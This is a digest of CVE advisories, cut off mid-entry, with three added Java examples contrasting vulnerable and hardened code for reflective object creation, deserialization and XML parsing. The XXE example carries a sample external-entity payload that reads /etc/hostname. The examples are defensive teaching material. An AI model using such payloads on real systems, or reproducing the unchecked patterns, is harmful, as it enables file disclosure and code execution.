CVE ID: CVE-2022-42302 (Critical)
Johnson Controls has released a security update to address a vulnerability in Metasys ADX
when using the MVE SMP UI, which allows an Active Directory user to execute validated
actions without providing a valid password. The affected version is Metasys ADX Server
version 12.0 running MVE.
CVE ID: CVE-2022-21936 (High)
A use of hard-coded credentials vulnerability has been discovered in Becton, Dickinson and
Company's Totalys MultiProcessor equipment that can allow an attacker to access, modify, or
delete sensitive information, including electronic protected health information (ePHI),
protected health information (PHI), and personally identifiable information (PII). The
affected versions are BD Totalys MultiProcessor 1.70 and earlier.
CVE ID: CVE-2022-40263 (Medium)
Security updates have been released for Data Exchange Layer (DXL) Broker to address multiple
vulnerabilities in its bundled Java, OpenSSL, Log4J, and RSA BSAFE Crypto components. The
affected versions are DXL Broker 6.0.0 and 5.x.
CVE ID: CVE-2019-3738 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2019-13351 (High), CVE-2022-33741 (High), CVE-2022-33744 (Medium),
CVE-2021-33655 (Medium), CVE-2022-33740 (High), CVE-2022-34495 (Medium), CVE-2022-26365 (High),
CVE-2022-36946 (High), CVE-2022-33743 (High), CVE-2022-33742 (High), CVE-2022-34494 (Medium),
CVE-2022-2318 (Medium), CVE-2022-1012 (High), CVE-2022-32296 (Low), CVE-2022-1729 (High),
CVE-2022-2503 (Medium), CVE-2022-41323, CVE-2022-40617, CVE-2021-3782 (Critical)
Dell has released security updates to address multiple vulnerabilities in Dell EMC Avamar,
Dell EMC NetWorker Virtual Edition (NVE) and Dell EMC PowerProtect DP Series Appliance /
Dell EMC Integrated Data Protection Appliance (IDPA).
SUSE has released a security update to resolve multiple vulnerabilities in the slurm
package.
CVE ID: CVE-2022-29500 (High), CVE-2022-29501 (High), CVE-2022-31251
(High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Microsoft has released Microsoft Edge Stable Channel (Version 106.0.1370.34) to resolve a
Spoofing vulnerability in Microsoft Edge (Chromium-based).
CVE ID: CVE-2022-41035 (High)
An Android security bulletin has been released to resolve multiple vulnerabilities affecting
Android devices. Security patch levels of 2022-10-05 or later address all of these
issues.
It has been discovered that in Amazon AWS Redshift JDBC Driver the Object Factory does not
check the class type when instantiating an object from a class name. The affected versions
are Amazon AWS Redshift JDBC Driver before 2.1.0.8.
CVE ID: CVE-2022-41828 (Critical)
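The pattern named in the Redshift entry above (an object factory that instantiates whatever class name it is handed) is shown here as an added example in both its unchecked and its checked form. This is illustration code written for this page, not code from the Amazon Redshift JDBC driver; the Plugin interface, the EchoPlugin class and the allowlist are assumptions made for the example.

```java
import java.util.Set;

// Added example, not code from the Amazon Redshift JDBC driver. The Plugin
// interface, EchoPlugin and the allowlist are assumptions for illustration.
public class ObjectFactoryExample {

    public interface Plugin {
        String name();
    }

    public static final class EchoPlugin implements Plugin {
        public EchoPlugin() {}
        public String name() { return "echo"; }
    }

    // Unchecked pattern: any class on the classpath can be named. Its static
    // initialiser and constructor run before the caller sees the object, and
    // the Object return type says nothing about what was actually created.
    public static Object createUnchecked(String className) throws Exception {
        Class<?> c = Class.forName(className);
        return c.getDeclaredConstructor().newInstance();
    }

    // Only the classes the application expects to build by name.
    private static final Set<String> ALLOWED = Set.of("ObjectFactoryExample$EchoPlugin");

    // Checked pattern: the name must be on the allowlist, the class is loaded
    // without running its static initialiser (initialize=false), and it must be
    // assignable to Plugin before any constructor is invoked.
    public static Plugin createChecked(String className) throws Exception {
        if (!ALLOWED.contains(className)) {
            throw new IllegalArgumentException("class not permitted: " + className);
        }
        Class<?> c = Class.forName(className, false, ObjectFactoryExample.class.getClassLoader());
        if (!Plugin.class.isAssignableFrom(c)) {
            throw new IllegalArgumentException("not a Plugin: " + className);
        }
        return c.asSubclass(Plugin.class).getDeclaredConstructor().newInstance();
    }

    public static void main(String[] args) throws Exception {
        // Accepted: prints "echo".
        System.out.println(createChecked("ObjectFactoryExample$EchoPlugin").name());
        // Rejected before loading: neither name is on the allowlist.
        for (String bad : new String[] {"java.io.File", "ObjectFactoryExample"}) {
            try {
                createChecked(bad);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

The order of the three checks matters: the allowlist runs before Class.forName so an unknown name never reaches the class loader, initialize=false keeps static initialisers from executing during the type check, and the isAssignableFrom test guarantees the constructor that finally runs belongs to a type the caller expects.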
A SQL Injection vulnerability has been discovered in BigProf Online Invoicing System. The
affected versions are BigProf Online Invoicing System before 2.9.
CVE ID: CVE-2020-35674 (Critical)
Microsoft has discovered Server-Side Request Forgery (SSRF), and Remote Code Execution (RCE)
zero-day vulnerabilities in Microsoft Exchange Server. The mitigations are available.
CVE ID: CVE-2022-41040, CVE-2022-41082
Debian has released a security update to address multiple vulnerabilities in Chromium
package, which can result in the execution of arbitrary code, Denial of Service (DoS) or
information disclosure.
CVE ID: CVE-2022-3370, CVE-2022-3373 (Medium)
An improper input validation vulnerability has been discovered in the Racadm component of
Dell iDRAC8 and Dell iDRAC9 when the firmware lock-down configuration is set. Security
updates are available. The affected products are Dell iDRAC9 version 6.00.02.00 and prior
and Dell iDRAC8 version 2.83.83.83 and prior.
CVE ID: CVE-2022-34435, CVE-2022-34436
An authorization bypass vulnerability has been discovered in b2evolution. The affected
versions are b2evolution 7.2.3 and below.
CVE ID: CVE-2022-30935 (Critical)
It has been discovered that WAPPLES has a hardcoded system account that can be exploited to
access the system configuration and confidential information (such as SSL keys) via an HTTPS
request to the /webapi/ URI on port 443 or 5001. The affected versions are WAPPLES through
6.0.
CVE ID: CVE-2022-35413 (Critical)
An arbitrary code execution vulnerability has been discovered in Coreboot. The affected
versions are Coreboot 4.13 through 4.16.
CVE ID: CVE-2022-29264 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to address multiple vulnerabilities in Dell Client
Platform BIOS that affect Alienware Area-51 R4 and Alienware Area-51 R5.
BookStack has released a security update to address a Cross-Site Scripting (XSS)
vulnerability in its product. The affected versions are BookStack prior to v22.09.
CVE ID: CVE-2022-40690 (Medium)
A command execution vulnerability has been discovered in the background tasks of XXL-JOB.
The affected version is XXL-JOB 2.2.0.
CVE ID: CVE-2022-40929 (Critical)
A vulnerability has been discovered in Zimbra Collaboration (ZCS) that allows an attacker to
upload arbitrary files through amavisd via a cpio loophole, which can lead to unauthorized
access to other user accounts. The affected versions are Zimbra Collaboration (ZCS) 8.8.15 and 9.0.
CVE ID: CVE-2022-41352 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Labstack Echo via
the Static Handler component. The affected version is Labstack Echo v4.8.0.
CVE ID: CVE-2022-40083 (Critical)
GitLab has released updated versions 15.4.1, 15.3.4, and 15.2.5 for GitLab Community Edition
(CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities.
Cisco has released security updates to resolve privilege escalation, and authentication
bypass vulnerabilities in Cisco SD-WAN, and Cisco Duo for macOS, respectively. An attacker
can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-20662 (Medium), CVE-2022-20775 (High), CVE-2022-20818
(High)
Multiple vulnerabilities such as denial of service, client-side script injection, and
information disclosure have been discovered in several Mitsubishi Electric products. The
mitigations are available.
CVE ID: CVE-2022-29859 (Low), CVE-2022-33322 (Medium), CVE-2022-33321
(Medium)
Drupal has released a security update to resolve a vulnerability in Twig, a third-party
library used by Drupal, that can allow users who are able to write Twig code to gain
unauthorized read access to private files, the contents of other files on the server, or
database credentials.
CVE ID: CVE-2022-39261 (Critical)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.3.1. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39249 (High), CVE-2022-39250 (High), CVE-2022-39251 (High),
CVE-2022-39236 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-32886, CVE-2022-37797, CVE-2022-41556, CVE-2022-29599
A local file inclusion vulnerability has been discovered in EyesOfNetwork (EON). The affected
versions are EyesOfNetwork through 5.3.11.
CVE ID: CVE-2022-41571 (Critical)
A SQL injection vulnerability has been discovered in EyesOfNetwork (EON). The affected
versions are EyesOfNetwork through 5.3.11.
CVE ID: CVE-2022-41570 (Critical)
A SQL injection vulnerability has been discovered in Exam Reviewer Management System. The
affected version is Exam Reviewer Management System 1.0.
CVE ID: CVE-2022-40877 (Critical)
An unauthenticated blind SQL Injection vulnerability has been discovered in Sourcecodester
Online Market Place Site. The affected version is Sourcecodester Online Market Place Site
v1.0.
CVE ID: CVE-2022-30004 (Critical)
Google has released Chrome 109.0.5412.2 (Platform version: 15236.2.0) and LTS channel
102.0.5005.185 (Platform Version: 14695.148.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-3450 (High), CVE-2022-3449 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20696 (High), CVE-2022-20728 (Medium), CVE-2021-27853 (Medium),
CVE-2021-27854 (Medium), CVE-2021-27861 (Medium), CVE-2021-27862 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a heap-based buffer overflow vulnerability
in the gdal package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code, if a specially crafted file is processed with the PCIDSK
driver.
CVE ID: CVE-2021-45943 (Medium)
A SQL injection vulnerability has been discovered in Wedding Planner via the id parameter at
/package_detail.php. The affected version is Wedding Planner v1.0.
CVE ID: CVE-2022-40485 (Critical)
An arbitrary code execution vulnerability has been discovered in the joblib package. The
affected versions are joblib before 1.2.0.
CVE ID: CVE-2022-21797 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Pulse Secure has released security updates to resolve a client-side desync vulnerability
between the client machine and the VPN server. The affected versions are VPN server releases
prior to 9.1R15.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A SQL injection vulnerability has been discovered in Online Banking System via the cust_id
parameter at /net-banking/edit_customer_action.php. The affected version is Online Banking
System v1.0.
CVE ID: CVE-2022-40122 (Critical)
It has been discovered that Scala has a Java deserialization chain in its JAR file that can
be exploited to erase the contents of arbitrary files, make network connections, or possibly
run arbitrary code via a gadget chain. The affected versions are Scala 2.13.x before 2.13.9.
CVE ID: CVE-2022-36944 (Critical)
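The Scala entry above describes the general risk of a gadget chain reachable through Java serialization. The following is an added example (illustration code for this page, not code from Scala or its standard library) of how the consuming side limits which classes a stream may resolve, so a gadget class that happens to be on the classpath is rejected before it is loaded. The Job record type is an assumption made for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Date;

// Added example, not Scala's code. Job is an assumed application type.
public class DeserializationFilterExample {

    public static final class Job implements Serializable {
        private static final long serialVersionUID = 1L;
        public final String id;
        public Job(String id) { this.id = id; }
    }

    public static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Unfiltered: every class named in the stream is resolved and its
    // readObject()/readResolve() hooks run, which is what a gadget chain needs.
    public static Object readUnfiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }

    // Filtered (JEP 290): Job and String are allowed, nesting depth is capped,
    // and the trailing "!*" rejects every other class before it is loaded.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=3;DeserializationFilterExample$Job;java.lang.String;!*");

    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Job j = (Job) readFiltered(serialize(new Job("build-42")));
        System.out.println("accepted: " + j.id);
        try {
            // java.util.Date stands in for any class the application never expects.
            readFiltered(serialize(new Date()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

A per-stream filter as above is the precise tool; the same pattern string can also be set process-wide with -Djdk.serialFilter so that every ObjectInputStream in the JVM, including ones inside third-party libraries, is covered.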
A vulnerability has been discovered in Tacitine Firewall due to improper control of code
generation in the Tacitine Firewall web-based management interface. Successful
exploitation by sending a specially crafted HTTP request can allow an attacker to execute
arbitrary commands on the targeted device. The affected versions are Tacitine Firewall all
versions of EN6200-PRIME QUAD-35 and EN6200-PRIME QUAD-100 between 19.1.1 and 22.20.1 (inclusive).
CVE ID: CVE-2022-40628 (Critical)
A heap-based buffer overflow vulnerability has been discovered in Rockwell Automation
ThinManager ThinServer, which can expose the server to arbitrary Remote Code Execution
(RCE). The affected versions are Rockwell Automation ThinManager ThinServer versions 11.0.0
- 13.0.0.
CVE ID: CVE-2022-38742 (Critical)
Two stack overflow vulnerabilities have been discovered in Grandstream GSD3710. The affected
version is Grandstream GSD3710 1.0.11.13.
CVE ID: CVE-2022-2070 (Critical), CVE-2022-2025 (Critical)
A broken access control vulnerability has been discovered in ZTE ZXvSTB product. Due to
improper permission control, attackers can use this vulnerability to delete the default
application type, which affects normal use of the system.
CVE ID: CVE-2022-23144 (Critical)
It has been discovered that in Apache Pinot the query endpoint and realtime ingestion layer
are vulnerable in unprotected environments due to Groovy function support. The affected
versions are Apache Pinot 0.10.0 and below.
CVE ID: CVE-2022-26112 (Critical)
An integer overflow vulnerability has been discovered in Redis. The affected versions are
Redis 7.0.0 & above and prior to 7.0.5.
CVE ID: CVE-2022-35951 (Critical)
Carlo Gavazzi Controls SpA has released security updates to address multiple vulnerabilities
in UWP 3.0 family of Monitoring Gateways and Controllers, and CPY Car Park Server in their
set-up software, runtime firmware, and embedded Web interface. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-22522 (Critical), CVE-2022-22524 (Critical), CVE-2022-22526
(Critical), CVE-2022-28811 (Critical), CVE-2022-28812 (Critical), CVE-2022-28814 (Critical),
CVE-2022-28816 (High), CVE-2022-22523 (High), CVE-2022-28813 (High), CVE-2022-22525 (High),
CVE-2022-28815 (Medium)
Sophos has released security updates to address a code injection vulnerability that allows
Remote Code Execution (RCE) in the User Portal and Webadmin of Sophos Firewall. The affected
versions are Sophos Firewall v19.0 MR1 (19.0.1) and below.
CVE ID: CVE-2022-3236 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple Remote Code Execution (RCE) vulnerabilities have been discovered in WhatsApp. The
affected versions are WhatsApp for Android prior to v2.22.16.12, Business for Android prior
to v2.22.16.12, iOS prior to v2.22.16.12, Business for iOS prior to v2.22.16.12, Android
prior to v2.22.16.2, and WhatsApp for iOS v2.22.15.9.
CVE ID: CVE-2022-36934, CVE-2022-27492
Ubuntu has released security updates to address several vulnerabilities in Linux kernel for
Google Container Engine (GKE). An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2021-33655, CVE-2022-2318, CVE-2022-36946, CVE-2022-26365,
CVE-2022-34495, CVE-2022-33744, CVE-2022-33742, CVE-2022-34494, CVE-2022-33741,
CVE-2022-33743, CVE-2022-33740
Debian has released a security update to address multiple vulnerabilities in Mozilla Firefox
Extended Support Releases (ESR) web browser, which can result in the execution of arbitrary
code, CSP bypass or session fixation.
CVE ID: CVE-2022-40956 (Low), CVE-2022-40957 (Low), CVE-2022-40958 (Medium),
CVE-2022-40959 (High), CVE-2022-40960 (High), CVE-2022-40962 (High)
A stack overflow vulnerability has been discovered in Tenda AC15 via the function
fromAddressNat. The affected version is Tenda AC15 V15.03.05.19.
CVE ID: CVE-2022-40851 (Critical)
A stack overflow vulnerability has been discovered in Tenda AC15 and AC18 routers. The
affected version is Tenda AC15 and AC18 routers V15.03.05.19.
CVE ID: CVE-2022-40869 (Critical)
A heap overflow vulnerability has been discovered in Tenda AC15 and AC18 routers. The
affected version is Tenda AC15 and AC18 routers V15.03.05.19.
CVE ID: CVE-2022-40865 (Critical)
A buffer overflow vulnerability has been discovered in Netgear Nighthawk AC1900 Smart WiFi
Dual Band Gigabit Router via the wl binary in firmware. The affected version is Netgear
Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router R7000-V1.0.11.134_10.2.119.
CVE ID: CVE-2022-37235 (Critical)
A buffer overflow vulnerability via uhttpd has been discovered in Netgear N300 wireless
router. The affected version is Netgear N300 wireless router wnr2000v4-V1.0.0.70.
CVE ID: CVE-2022-37232 (Critical)
A stack overflow vulnerability has been discovered in Netgear N300 wireless router via
strcpy in uhttpd. The affected version is Netgear N300 wireless router wnr2000v4-V1.0.0.70.
CVE ID: CVE-2022-31937 (Critical)
A buffer overflow vulnerability has been discovered in 10-Strike Network Inventory Explorer
via the Add Computers function. The affected version is 10-Strike Network Inventory Explorer
v9.3.
CVE ID: CVE-2022-38573 (Critical)
An OS command injection vulnerability has been discovered in NOKIA 1350 OMS. The affected
version is NOKIA 1350 OMS R14.2.
CVE ID: CVE-2022-39815 (Critical)
A client authentication bypass vulnerability has been discovered in Erlang/OTP in certain
client-certification situations for SSL, TLS, and DTLS. The affected versions are Erlang/OTP
before 23.3.4.15, 24.x before 24.3.4.2, and 25.x before 25.0.2.
CVE ID: CVE-2022-37026 (Critical)
COVESA has released a security update to address multiple vulnerabilities in the COVESA DLT
daemon. The affected versions are COVESA DLT daemon 2.18.8 and below.
CVE ID: CVE-2022-39836, CVE-2022-39837
Multiple memory corruption vulnerabilities have been discovered in the uClibc and uClibc-ng
libraries that can affect any Unix-based device using these libraries. The affected
versions are uClibc 0.9.33.2 and uClibc-ng 1.0.40.
CVE ID: CVE-2022-29503, CVE-2022-29504
An improper access control vulnerability has been discovered in Measuresoft's Equipment-
ScadaPro Server that can allow a local user with limited privileges to modify the service
binary path and start malicious commands with system privileges. The affected version is
ScadaPro Server 6.7.
CVE ID: CVE-2022-3263 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve Denial of Service (DoS), and privilege
escalation vulnerabilities in Cisco NX-OS Software Border Gateway Protocol, and Cisco Secure
Web Appliance respectively.
CVE ID: CVE-2022-20871 (High), CVE-2018-0295 (High)
Google has released Beta channel 106.0.5249.49 (Platform version: 15054.62.0/15054.63.0) for
most ChromeOS devices, Dev channel 107.0.5304.10 for Windows, Mac and Linux, and Chrome Dev
107 (107.0.5304.8) for Android.
Foxit has released an updated Foxit PDF Editor for Mac 11.1.3, to resolve multiple
vulnerabilities in Foxit PDF Editor for Mac 11.1.2.0420 and earlier for macOS.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A weak password requirement vulnerability has been discovered in minarca (GitHub repository
ikus060/minarca). The affected versions are minarca prior to 4.2.2.
CVE ID: CVE-2022-3268 (Critical)
A SQL injection vulnerability has been discovered in SourceCodester Simple Task Managing
System via the bookId parameter at changeStatus.php. The affected version is SourceCodester
Simple Task Managing System v1.0.
CVE ID: CVE-2022-40030 (Critical)
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in a web server
component of TIBCO Software Inc's TIBCO EBX Add-ons. The affected versions are TIBCO EBX
Add-ons 5.4.1 and below.
CVE ID: CVE-2022-30578 (Critical)
A stored Cross Site Scripting (XSS) vulnerability has been discovered in web server
component TIBCO Software Inc's TIBCO EBX. The affected versions are TIBCO EBX 6.0.0 through
6.0.8.
CVE ID: CVE-2022-30577 (Critical)
It has been discovered that Jenkins RQM Plugin is vulnerable to XML External Entity (XXE)
attacks. The affected versions are Jenkins RQM Plugin 2.8 and earlier.
CVE ID: CVE-2022-41241 (Critical)
It has been discovered that Jenkins DotCi Plugin is vulnerable to XML External Entity (XXE)
attacks. The affected versions are Jenkins DotCi Plugin 2.40.00 and earlier.
CVE ID: CVE-2022-41238 (Critical)
It has been discovered that Jenkins Compuware Common Configuration Plugin is vulnerable to
XML External Entity (XXE) attacks. The affected versions are Jenkins Compuware Common
Configuration Plugin 1.0.14 and earlier.
CVE ID: CVE-2022-41226 (Critical)
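The three Jenkins plugin entries above share one root cause: an XML parser left at its defaults, which resolves external entities. The following added example (written for this page; it is not code from any of those plugins, which may use other XML APIs) shows a default JAXP DocumentBuilder beside a hardened one, run against a constructed document carrying an external entity.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Added example, not code from the Jenkins plugins named in the advisory.
public class XxeHardeningExample {

    // Constructed sample document: the entity points at a local file that the
    // parser would read and return as element text if entities are resolved.
    static final String XXE_DOC =
            "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE r [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]>\n"
            + "<r>&xxe;</r>";

    // Vulnerable: JAXP defaults resolve external general entities and load external DTDs.
    public static DocumentBuilder defaultBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened: refuse any DOCTYPE, and additionally switch off every entity and
    // DTD/schema fetching path in case a parser ignores the first feature.
    // Parsers other than the JDK's built-in Xerces may reject an unsupported
    // feature name with ParserConfigurationException; treat that as a hard error.
    public static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f.newDocumentBuilder();
    }

    public static String rootText(DocumentBuilder b, String xml) throws SAXException, IOException {
        Document d = b.parse(new InputSource(new StringReader(xml)));
        return d.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // rootText(defaultBuilder(), XXE_DOC) would return the contents of /etc/hostname.
        try {
            rootText(hardenedBuilder(), XXE_DOC);
        } catch (SAXException e) {
            System.out.println("hardened parser rejected the document: " + e.getMessage());
        }
    }
}
```

disallow-doctype-decl is the single setting that closes the whole class, because every XXE payload needs a DOCTYPE; the remaining features matter only where a DTD must be accepted for legitimate documents, and then they should all be set together.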
A SQL injection vulnerability has been discovered in SmartVista SVFE2. The affected version
is SmartVista SVFE2 v2.2.22.
CVE ID: CVE-2022-38619 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Z-BlogPHP that
allows an attacker to make arbitrary requests via injection of arbitrary URLs into the
source parameter. The affected versions are Z-BlogPHP 1.7.2 and earlier.
CVE ID: CVE-2022-40357 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Valine that allows to
execute arbitrary code via a crafted POST request. The affected version is Valine v1.4.18.
CVE ID: CVE-2022-38545 (Critical)
An authentication bypass vulnerability has been discovered in Linux-PAM package for openSUSE
Tumbleweed. The affected versions are Linux-PAM packages before 1.5.2-6.1.
CVE ID: CVE-2022-28321 (Critical)
Debian has released security updates to address multiple vulnerabilities in BIND9, and
Expat.
CVE ID: CVE-2022-2795 (Medium), CVE-2022-3080 (High), CVE-2022-38177 (High),
CVE-2022-38178 (High), CVE-2022-40674 (Critical)
ISC has released security updates to address vulnerabilities affecting multiple versions of
the ISC’s Berkeley Internet Name Domain (BIND) 9. A remote attacker can exploit these
vulnerabilities to take control of an affected system.
HP has released security updates to resolve buffer overflow, and Remote Code Execution (RCE)
vulnerabilities in HP Print products.
CVE ID: CVE-2022-28721 (Critical), CVE-2022-28722 (High)
WordPress has released a security update to address a Cross-Site Request Forgery (CSRF)
vulnerability in the demon image annotation plugin for WordPress. The affected versions are
demon image annotation versions up to, and including 4.7.
CVE ID: CVE-2022-2864 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SUSE has released security updates to resolve multiple vulnerabilities in
skelcd-control-suse-manager-proxy, and skelcd-control-suse-manager-server. The affected
products are SUSE Manager Proxy 4.3, SUSE Manager Retail Branch Server 4.3, and SUSE Manager
Server 4.3.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a command execution vulnerability while
processing untrusted files in the wordexp() function of the tinygltf package.
CVE ID: CVE-2022-3008 (High)
A heap-use-after-free vulnerability has been discovered in SWFTools commit 772e55a via the
function grow_unicode at /lib/ttf.c.
CVE ID: CVE-2022-40009 (Critical)
A heap-buffer overflow vulnerability has been discovered in SWFTools commit 772e55a via the
function readU8 at /lib/ttf.c.
CVE ID: CVE-2022-40008 (Critical)
A file upload vulnerability has been discovered in the storage feature of pagekit, which can
allow malicious files to be uploaded. The affected version is pagekit 1.0.18.
CVE ID: CVE-2022-38916 (Critical)
Kayrasoft has released a security update to address a SQL injection vulnerability in its
products. The affected versions are Kayrasoft products before version 2.
CVE ID: CVE-2022-2177 (Critical)
It has been discovered that an exposed external port for the telnet service can cause a
vulnerability in NIS-HAP11AC which can allow source code hijacking and remote control of the
device.
CVE ID: CVE-2022-23768 (Critical)
Trend Micro has released a security update to address an unauthenticated file deletion
vulnerability in Trend Micro Mobile Security, which can allow access to the Management
Server to delete files. The affected version is Trend Micro Mobile Security for Enterprise
9.8 SP5.
CVE ID: CVE-2022-40980 (Critical)
A vulnerability has been discovered in Trend Micro Apex One and Trend Micro Apex One as a
Service that allows the product's login authentication to be bypassed by falsifying request
parameters on affected installations.
CVE ID: CVE-2022-40144 (Critical)
It has been discovered that due to a reliance on client-side authentication, the WiFi Mouse
(Mouse Server) from Necta LLC's authentication mechanism is trivially bypassed, which can
result in Remote Code Execution (RCE).
CVE ID: CVE-2022-3218 (Critical)
It has been discovered that the d8s-ip-addresses package for Python includes a potential
code-execution backdoor inserted by a third party. The affected version is 0.1.0.
CVE ID: CVE-2022-40810 (Critical)
A SQL injection vulnerability has been discovered in Zephyr Project Manager WordPress
plugin. The affected versions are Zephyr Project Manager WordPress plugin before 3.2.5.
CVE ID: CVE-2022-2840 (Critical)
A SQL injection vulnerability has been discovered in Ketchup Restaurant Reservations
WordPress plugin. The affected versions are Ketchup Restaurant Reservations WordPress plugin
through 1.0.0.
CVE ID: CVE-2022-2754 (Critical)
A SQL injection vulnerability has been discovered in Zoho ManageEngine Password Manager Pro,
PAM360, and Access Manager Plus. The affected versions are Password Manager Pro through
12120 before 12121, PAM360 through 5550 before 5600, and Access Manager Plus through 4304
before 4305.
CVE ID: CVE-2022-40300 (Critical)
Microsoft has released a security update to address a spoofing vulnerability in Microsoft
Endpoint Configuration Manager. The affected versions are Microsoft Endpoint Configuration
Manager versions 2103 – 2207.
CVE ID: CVE-2022-37972 (High)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.3. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-40959 (High), CVE-2022-40960 (High), CVE-2022-40958 (Medium),
CVE-2022-40956 (Low), CVE-2022-40957 (Low), CVE-2022-40962 (High), CVE-2022-3155
(Low)
A protection mechanism failure vulnerability has been discovered in Medtronic's
Equipment- MiniMed 600 Series Insulin Pumps, Guardian Link 3 Transmitter, Guardian 2 Link
Transmitter, Carelink USB, Contour Next Link 2.4. Successful exploitation of this
vulnerability can impact delivery of insulin.
CVE ID: CVE-2022-32537 (Medium)
Host Engineering has released a security update to address a stack-based buffer overflow
vulnerability in its equipment- H0-ECOM100 Communications Module, which can crash the device
being accessed and lead to a Denial-of-Service (DoS) condition.
CVE ID: CVE-2022-3228 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Mozilla has released security updates to address multiple vulnerabilities in Firefox ESR
102.3, and Firefox 105. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-40959 (High), CVE-2022-40960 (High), CVE-2022-40958 (Medium),
CVE-2022-40956 (Low), CVE-2022-40957 (Low), CVE-2022-40962 (High), CVE-2022-40961
(Medium)
Dell has released a security update to address multiple vulnerabilities in third-party
